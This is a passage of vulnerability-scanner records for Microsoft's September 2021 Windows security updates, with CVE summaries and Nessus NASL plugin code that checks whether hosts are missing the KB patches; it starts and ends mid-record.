"NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005607 or cumulative update 5005623. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005607: Windows Server 2012 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005623.NASL", "href": "https://www.tenable.com/plugins/nessus/153384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153384);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005607\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005607\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n\n script_name(english:\"KB5005607: Windows Server 2012 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005607\nor cumulative update 5005623. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38633,\n CVE-2021-38638, CVE-2021-38639, CVE-2021-38667,\n CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005607-security-only-update-f2cb16bb-7282-4f2e-a43e-50c4163c877c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e96fa374\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005623-monthly-rollup-bcdb6598-517e-4d53-aa7c-dd7fcfdca204\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?adb97de7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005607 or Cumulative Update KB5005623.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005607', '5005623');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005607, 5005623])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:18", "description": "The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005568.NASL", "href": "https://www.tenable.com/plugins/nessus/153373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153373);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005568\");\n script_xref(name:\"MSFT\", value:\"MS21-5005568\");\n\n script_name(english:\"KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005568-os-build-17763-2183-d19b2778-204a-4c09-a0c3-23dc28d5deac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54269929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005568.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005568');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005568])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:03", "description": "The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005565.NASL", "href": "https://www.tenable.com/plugins/nessus/153381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153381);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005565\");\n script_xref(name:\"MSFT\", value:\"MS21-5005565\");\n\n script_name(english:\"KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005565-os-builds-19041-1237-19042-1237-and-19043-1237-292cf8ed-f97b-4cd8-9883-32b71e3e6b44\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45dd819c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005565'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565]) \n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19043',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, 